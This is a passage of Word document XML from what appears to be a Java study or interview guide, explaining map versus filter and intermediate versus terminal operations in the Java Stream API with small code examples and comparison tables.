            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65DDEF94"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need to transform data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E3CE58D"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need to remove unwanted elements or filter out based on conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="69CD78FE" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79407BE7"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39DE52AA"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pping each number to its square</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21162671" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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ltering even numbers from a list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AA78E1B" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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to Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59034F83" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transform</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the elements in the stream into a different form (e.g., converting data types or applying some function to each element).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E4D26" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements from the stream based on a condition (e.g., keeping only those elements that satisfy a certain predicate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7A73EE" w14:textId="04649148" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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3BE3E31">
          <v:rect id="_x0000_i1693" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C78B72F" w14:textId="77777777" w:rsidR="00E34A55" w:rsidRPr="00CE4B95" w:rsidRDefault="00E34A55" w:rsidP="00E34A55">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12281ED0" w14:textId="77777777" w:rsidR="000620CC" w:rsidRPr="00CE4B95" w:rsidRDefault="000620CC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="226" w:name="_Toc196307706"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the intermediate and terminal operator in Java stream API?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="226"/>
    </w:p>
    <w:p w14:paraId="7242D54B" w14:textId="035973F5" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00B422C8" w:rsidP="00B422C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">n Java Stream API, operations are divided into two categories based on their characteristics: </w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>intermediate</w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>terminal</w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FDA57F"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Intermediate Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2A75F" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101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inition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Intermediate operations are operations that transform a stream into another stream. These operations are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lazy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning they are not executed until a terminal operation is invoked on the stream. They can be chained together, and each intermediate operation returns a new stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179B9DC3" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101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ature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Intermediate operations are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-terminal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and they do not produce a result themselves; they just modify the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480008CC" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445E5479" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101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p()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DB820B" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101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lter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D18C2E8" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101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istinct()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F9E8C5" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101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orted()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536380AB" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101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latMap()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4BF551" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101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eek()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0EEC0F" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101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mit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0382C7CE" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101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kip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B37E0D5"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Intermediate Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B931A8"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Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5, 6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B2D18D"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List&lt;Integer&gt; result = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371DC7B2"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lter(n -&gt; n % 2 == 0)  // filter operation (intermediate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C82B75B"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n -&gt; n * n)           // map operation (intermediate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC0E0AC"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  // terminal operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B77EC51"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result);  // Output: [4, 16, 36]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B1C45C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C6A43B" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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lter and map are intermediate operations that modify the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77976F15" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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tream is processed step-by-step, but the processing happens only after a terminal operation (collect) is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078D6EF2"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Terminal Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E5E632" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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inition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Terminal operations are operations that produce a result, either a non-stream value (like a List, Integer, Double, etc.) or cause a side effect (like printing to the console). Once a terminal operation is executed, the stream is consumed, and no further operations can be applied on it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BCF36B" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Terminal operations trigger the processing of the stream and are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eager</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., they start the stream pipeline execution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D30EE3" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEEEB16" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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llect()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BD95EB" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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Each()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2D1391" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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duce()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F54682E" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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unt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142DA9FE" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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in()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DF43B9" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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x()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E35F0DE" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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nyMatch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66663443" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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lMatch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EFD058" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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neMatch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0018B04A" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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ndFirst()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2FC526" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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ndAny()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AB1A7A"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Terminal Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54236900"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Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5, 6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D80050E"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ng count = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634EE50B"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lter(n -&gt; n % 2 == 0)   // intermediate operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B5B3AE"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unt();                  // terminal operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BB0E80"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count);  // Output: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08281ABF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0596C77D" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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lter is an intermediate operation that processes the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046FBF6F" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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unt is a terminal operation that computes the number of elements in the filtered stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0FC191"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3"/>
        <w:gridCol w:w="4573"/>
        <w:gridCol w:w="4088"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="6E27173B" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D81B303"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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03BD640B"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termediate Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13B3A755"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erminal Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="6CDE4574" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CB32AD7"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finition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="307F766A"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ansforms the stream into another stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24EE812C"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oduces a result or triggers side effects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="3126CEBA" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="261B767E"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ecution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="069D834A"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azy execution (operations are not executed until a terminal operation is invoked)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63C2543F"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ger execution (trigger the processing of the stream)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="026FEA8E" w14:textId="77777777" w:rsidTr="00D844E8">
